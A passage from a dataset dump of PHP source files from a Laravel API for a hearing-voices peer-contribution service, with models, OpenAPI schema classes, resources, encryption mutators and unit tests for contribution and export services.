"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Http\\JsonResponse;\n\nclass Setting extends Model\n{\n use Mutators\\SettingMutators;\n use Relationships\\SettingRelationships;\n use Scopes\\SettingScopes;\n\n const WITH_PRIVATE = true;\n const WITHOUT_PRIVATE = false;\n\n /**\n * Indicates if the IDs are UUIDs.\n *\n * @var bool\n */\n protected $keyIsUuid = false;\n\n /**\n * The primary key for the model.\n *\n * @var string\n */\n protected $primaryKey = 'key';\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'is_private' => 'boolean',\n ];\n\n /**\n * @param bool $withPrivate\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public static function toResponse(bool $withPrivate = false): JsonResponse\n {\n $settings = static::all();\n\n if (!$withPrivate) {\n $settings = $settings->reject->is_private;\n }\n\n $settings = $settings->mapWithKeys(function (Setting $setting): array {\n return [$setting->key => $setting->value];\n });\n\n return response()->json(['data' => $settings]);\n }\n}\n"
},
{
"alpha_fraction": 0.537214457988739,
"alphanum_fraction": 0.5379513502120972,
"avg_line_length": 18.66666603088379,
"blob_id": "7665492cb2ce039bf282de5af4c101c3f248339d",
"content_id": "1b9e4fef6174921d4b9f74592dc4e961b8aa8aff",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1357,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 69,
"path": "/app/Support/Enum.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse Illuminate\\Support\\Str;\nuse ReflectionClass;\n\nclass Enum\n{\n /**\n * @var string[]\n */\n protected $constants;\n\n /**\n * Enum constructor.\n *\n * @param object|string $class\n * @throws \\ReflectionException\n */\n public function __construct($class)\n {\n $reflectionClass = new ReflectionClass($class);\n $this->constants = $reflectionClass->getConstants();\n }\n\n /**\n * Gets the enums with.\n *\n * @param string $prefix\n * @return string[]\n */\n public function get(string $prefix): array\n {\n // Clone the constants array.\n $constants = $this->constants;\n\n // Filter only constants with prefix given.\n foreach ($constants as $name => $value) {\n if (Str::startsWith($name, \"{$prefix}_\")) {\n continue;\n }\n\n unset($constants[$name]);\n }\n\n return $constants;\n }\n\n /**\n * @param string $prefix\n * @return string[]\n */\n public function getValues(string $prefix): array\n {\n return array_values($this->get($prefix));\n }\n\n /**\n * @param string $prefix\n * @return string[]\n */\n public function getKeys(string $prefix): array\n {\n return array_keys($this->get($prefix));\n }\n}\n"
},
{
"alpha_fraction": 0.6091370582580566,
"alphanum_fraction": 0.6104061007499695,
"avg_line_length": 27.14285659790039,
"blob_id": "f88fddea6ae60e9ce6015b9d668da5b658b9cbf6",
"content_id": "f4ef6d560b3a5f00ff85940292053abdfb28febf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 788,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 28,
"path": "/app/Docs/Schemas/File/FileDownloadUrlSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\File;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass FileDownloadUrlSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('token')\n ->format(Schema::FORMAT_UUID),\n Schema::string('download_url'),\n Schema::string('expires_at')\n ->format(Schema::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6146010160446167,
"alphanum_fraction": 0.6162987947463989,
"avg_line_length": 18.633333206176758,
"blob_id": "68159435bacf7ee5d359f4f069447ecd957cb782",
"content_id": "d5297f1ced93bef6ae341d1e66b3f3133fe05ad9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 589,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 30,
"path": "/app/Listeners/EventSubscriber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse Illuminate\\Events\\Dispatcher;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\n\nabstract class EventSubscriber\n{\n use DispatchesJobs;\n\n /**\n * @param \\Illuminate\\Events\\Dispatcher $events\n */\n public function subscribe(Dispatcher $events): void\n {\n $class = static::class;\n\n foreach ($this->mapping() as $event => $handler) {\n $events->listen($event, \"{$class}@{$handler}\");\n }\n }\n\n /**\n * @return string[]\n */\n abstract protected function mapping(): array;\n}\n"
},
{
"alpha_fraction": 0.6186840534210205,
"alphanum_fraction": 0.6233999729156494,
"avg_line_length": 35.80165100097656,
"blob_id": "1f51c86e07064be1a0f5447911c6260e7838ebc8",
"content_id": "a9f301de0137eed12c8d1d5ba9ab3c01f5020cf3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4453,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 121,
"path": "/app/Http/Resources/EndUserResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\EndUser $resource\n */\nclass EndUserResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'email' => $this->resource->user->email,\n 'country' => $this->resource->country,\n 'birth_year' => $this->resource->birth_year,\n 'gender' => $this->resource->gender,\n 'ethnicity' => $this->resource->ethnicity,\n 'contributions_count' => $this->getContributionsCount(),\n 'public_contributions_count' => $this->getPublicContributionsCount(),\n 'private_contributions_count' => $this->getPrivateContributionsCount(),\n 'in_review_contributions_count' => $this->getInReviewContributionsCount(),\n 'changes_requested_contributions_count' => $this->getChangesRequestedContributionsCount(),\n 'gdpr_consented_at' => $this->resource->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => optional($this->resource->user->email_verified_at)->toIso8601String(),\n 'created_at' => $this->resource->user->created_at->toIso8601String(),\n 'updated_at' => $this->resource->user->updated_at->toIso8601String(),\n 'deleted_at' => optional($this->resource->user->deleted_at)->toIso8601String(),\n ];\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getContributionsCount(): int\n {\n return $this->contributions_count ?? (int)$this->whenLoaded(\n 'contributions',\n count($this->resource->contributions),\n $this->resource->contributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getPublicContributionsCount(): int\n {\n return $this->public_contributions_count ?? (int)$this->whenLoaded(\n 'publicContributions',\n count($this->resource->publicContributions),\n $this->resource->publicContributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getPrivateContributionsCount(): int\n {\n return $this->private_contributions_count ?? (int)$this->whenLoaded(\n 'privateContributions',\n count($this->resource->privateContributions),\n $this->resource->privateContributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getInReviewContributionsCount(): int\n {\n return $this->in_review_contributions_count ?? (int)$this->whenLoaded(\n 'inReviewContributions',\n count($this->resource->inReviewContributions),\n $this->resource->inReviewContributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getChangesRequestedContributionsCount(): int\n {\n return $this->changes_requested_contributions_count ?? (int)$this->whenLoaded(\n 'changesRequestedContributions',\n count($this->resource->changesRequestedContributions),\n $this->resource->changesRequestedContributions()->count()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6087912321090698,
"alphanum_fraction": 0.6109890341758728,
"avg_line_length": 17.200000762939453,
"blob_id": "39e2180cba928cb56e8f1353fa8e74f6c9a59914",
"content_id": "cb83503cec4f1032b2d2d444f0491b1d0c4f53d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 455,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 25,
"path": "/app/Models/Mutators/NotificationMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait NotificationMutators\n{\n /**\n * @param string $content\n * @return string\n */\n public function getContentAttribute(string $content): string\n {\n return decrypt($content);\n }\n\n /**\n * @param string $content\n */\n public function setContentAttribute(string $content): void\n {\n $this->attributes['content'] = encrypt($content);\n }\n}\n"
},
{
"alpha_fraction": 0.6146853566169739,
"alphanum_fraction": 0.6167151927947998,
"avg_line_length": 34.08049392700195,
"blob_id": "a0b867dfb90a6847def66f393005413b19cb74e1",
"content_id": "f0d29886f4504a53d835f1c6160a581461577770",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 11331,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 323,
"path": "/tests/Unit/Services/ContributionServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Contribution\\ContributionApproved;\nuse App\\Events\\Contribution\\ContributionCreated;\nuse App\\Events\\Contribution\\ContributionDeleted;\nuse App\\Events\\Contribution\\ContributionRejected;\nuse App\\Events\\Contribution\\ContributionUpdated;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse App\\Services\\ContributionService;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass ContributionServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_contribution_tag_and_contribution_record(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution = $contributionService->create([\n 'end_user_id' => $endUser->id,\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [$tag->id],\n ]);\n\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n $this->assertEquals($endUser->id, $contribution->end_user_id);\n $this->assertEquals('Lorem ipsum', $contribution->content);\n $this->assertEquals(Contribution::STATUS_PRIVATE, $contribution->status);\n $this->assertEquals([$tag->id], $contribution->tags->pluck('id')->toArray());\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([ContributionCreated::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $contribution = $contributionService->create([\n 'end_user_id' => $endUser->id,\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n Event::assertDispatched(\n ContributionCreated::class,\n function (ContributionCreated $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_updates_and_changes_status_from_public_to_in_review(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_IN_REVIEW, $contribution->status);\n }\n\n /** @test */\n public function it_updates_and_leaves_status_as_private(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_PRIVATE, $contribution->status);\n }\n\n /** @test */\n public function it_updates_and_leaves_status_as_in_review(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_IN_REVIEW, $contribution->status);\n }\n\n /** @test */\n public function it_updates_and_changes_status_from_changes_requested_to_in_review(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_IN_REVIEW, $contribution->status);\n }\n\n /** @test */\n public function it_updates_tags(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $tag1 = factory(Tag::class)->create();\n $tag2 = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag1->id]);\n\n $contribution = $contributionService->update($contribution, [\n 'tags' => [$tag2->id],\n ]);\n\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag1->id,\n ]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag2->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n Event::fake([ContributionUpdated::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n Event::assertDispatched(\n ContributionUpdated::class,\n function (ContributionUpdated $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_deletes_the_contribution_tag_and_contribution_records(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $contributionService->delete($contribution);\n\n $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_deleted(): void\n {\n Event::fake([ContributionDeleted::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contributionService->delete($contribution);\n\n Event::assertDispatched(\n ContributionDeleted::class,\n function (ContributionDeleted $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_approves_a_contribution(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $now = Date::now()->addMonth();\n Date::setTestNow($now);\n\n $contribution = $contributionService->approve($contribution);\n\n $this->assertEquals(Contribution::STATUS_PUBLIC, $contribution->status);\n $this->assertEquals(null, $contribution->changes_requested);\n $this->assertEquals(\n $now->toIso8601String(),\n $contribution->status_last_updated_at->toIso8601String()\n );\n }\n\n /** @test */\n public function it_dispatches_an_event_when_approved(): void\n {\n Event::fake([ContributionApproved::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $contribution = $contributionService->approve($contribution);\n\n Event::assertDispatched(\n ContributionApproved::class,\n function (ContributionApproved $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_rejects_a_contribution(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $now = Date::now()->addMonth();\n Date::setTestNow($now);\n\n $contribution = $contributionService->reject($contribution, 'Lorem ipsum');\n\n $this->assertEquals(Contribution::STATUS_CHANGES_REQUESTED, $contribution->status);\n $this->assertEquals('Lorem ipsum', $contribution->changes_requested);\n $this->assertEquals(\n $now->toIso8601String(),\n $contribution->status_last_updated_at->toIso8601String()\n );\n }\n\n /** @test */\n public function it_dispatches_an_event_when_rejected(): void\n {\n Event::fake([ContributionRejected::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $contribution = $contributionService->reject($contribution, 'Lorem ipsum');\n\n Event::assertDispatched(\n ContributionRejected::class,\n function (ContributionRejected $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6899999976158142,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 9,
"blob_id": "cf2215f117c22d4aae992633ca13d61ab866f1b1",
"content_id": "ba65b9d57d95e34405d4099bd30927cf5d6b9b82",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 100,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/FileTokenMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait FileTokenMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5983999967575073,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 15.447368621826172,
"blob_id": "af4387000f09ba7563b9122639197f5b63e3a637",
"content_id": "29bb9e16d56ac96bc7cbfd8584203d76c93734bb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 625,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 38,
"path": "/app/Events/Audit/AuditCreated.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Audit;\n\nuse App\\Models\\Audit;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass AuditCreated\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Audit\n */\n protected $audit;\n\n /**\n * AuditCreated constructor.\n *\n * @param \\App\\Models\\Audit $audit\n */\n public function __construct(Audit $audit)\n {\n $this->audit = $audit;\n }\n\n /**\n * @return \\App\\Models\\Audit\n */\n public function getAudit(): Audit\n {\n return $this->audit;\n }\n}\n"
},
{
"alpha_fraction": 0.5377969741821289,
"alphanum_fraction": 0.542116641998291,
"avg_line_length": 32.07143020629883,
"blob_id": "c6b98f52715c6efc613c3a13d9211840af700a8c",
"content_id": "ca62ca7f966c3095f8ec303a47c3218f714839f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1389,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 42,
"path": "/app/Docs/Schemas/Contribution/StoreContributionSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Contribution;\n\nuse App\\Models\\Contribution;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass StoreContributionSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->required(\n 'content',\n 'status',\n 'tags'\n )\n ->properties(\n Schema::string('content')\n ->maxLength(10000),\n Schema::string('status')\n ->enum(Contribution::STATUS_IN_REVIEW, Contribution::STATUS_PRIVATE)\n ->description('Use `in_review` for public consumption and `private` for personal use.'),\n Schema::array('tags')\n ->items(\n Schema::object()->properties(\n Schema::string('id')\n ->format(Schema::FORMAT_UUID)\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6261802315711975,
"alphanum_fraction": 0.6266094446182251,
"avg_line_length": 28.125,
"blob_id": "cc06c9120375f10f479597e83c50be5c29b2220d",
"content_id": "c54f602389e5896b9c186d4b8fa23670e0d906d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2330,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 80,
"path": "/tests/Unit/Services/ExportServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Export\\ExportRequested;\nuse App\\Exceptions\\ExporterNotFoundException;\nuse App\\Exceptions\\InvalidExporterException;\nuse App\\Models\\Admin;\nuse App\\Models\\Export;\nuse App\\Services\\ExportService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass ExportServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_an_export_for_a_valid_export(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $export = $exportService->create('all', $admin);\n\n $this->assertInstanceOf(Export::class, $export);\n }\n\n /** @test */\n public function it_throws_exception_for_missing_exporter(): void\n {\n $this->expectException(ExporterNotFoundException::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $exportService->create('missing', $admin);\n }\n\n /** @test */\n public function it_throws_exception_for_invalid_exporter(): void\n {\n $this->expectException(InvalidExporterException::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $exportService->create('test', $admin, 'Tests\\\\Stubs\\\\Exporters');\n }\n\n /** @test */\n public function it_dispatches_an_event_when_requested(): void\n {\n Event::fake([ExportRequested::class]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $export = $exportService->create('all', $admin);\n\n Event::assertDispatched(\n ExportRequested::class,\n function (ExportRequested $event) use ($export): bool {\n return $event->getExport()->is($export);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6548410654067993,
"alphanum_fraction": 0.6555801630020142,
"avg_line_length": 33.69230651855469,
"blob_id": "52468902bd2152d0ece812b3d114aac11138d822",
"content_id": "2c1fd4b108679300ca9f61a9d476f5cae84bb5fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1353,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 39,
"path": "/app/Docs/Paths/EndUsers/EndUsersNestedPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\EndUsers;\n\nuse App\\Docs\\Operations\\EndUser\\DestroyEndUserOperation;\nuse App\\Docs\\Operations\\EndUser\\ShowEndUserOperation;\nuse App\\Docs\\Operations\\EndUser\\UpdateEndUserOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass EndUsersNestedPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/end-users/{end_user}')\n ->parameters(\n Parameter::path()\n ->name('end_user')\n ->description('The ID of the end user')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ShowEndUserOperation::create(),\n UpdateEndUserOperation::create(),\n DestroyEndUserOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5570881366729736,
"alphanum_fraction": 0.5624520778656006,
"avg_line_length": 32.46154022216797,
"blob_id": "11040a8d92b8c20c41fab5a9c9dc2ce18250e5f7",
"content_id": "1b4de78710e3d868b50896470bef7c7631b50a44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1305,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 39,
"path": "/app/Docs/Schemas/EndUser/UpdateEndUserSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\EndUser;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass UpdateEndUserSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('email')\n ->maxLength(255),\n Schema::string('password')\n ->maxLength(255),\n Schema::string('country')\n ->nullable(),\n Schema::integer('birth_year')\n ->minimum(Date::today()->year - Config::get('connecting_voices.age_requirement.max'))\n ->maximum(Date::today()->year - Config::get('connecting_voices.age_requirement.min'))\n ->nullable(),\n Schema::string('gender')\n ->nullable(),\n Schema::string('ethnicity')\n ->nullable()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5316927433013916,
"alphanum_fraction": 0.5324384570121765,
"avg_line_length": 32.525001525878906,
"blob_id": "80c3e769d2473ce2ed8cca5ec7a6a73a9424d8b0",
"content_id": "d27a57f22d41acddd66514e64e5226eb9f9fad37",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1341,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 40,
"path": "/app/Docs/Schemas/PaginationSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
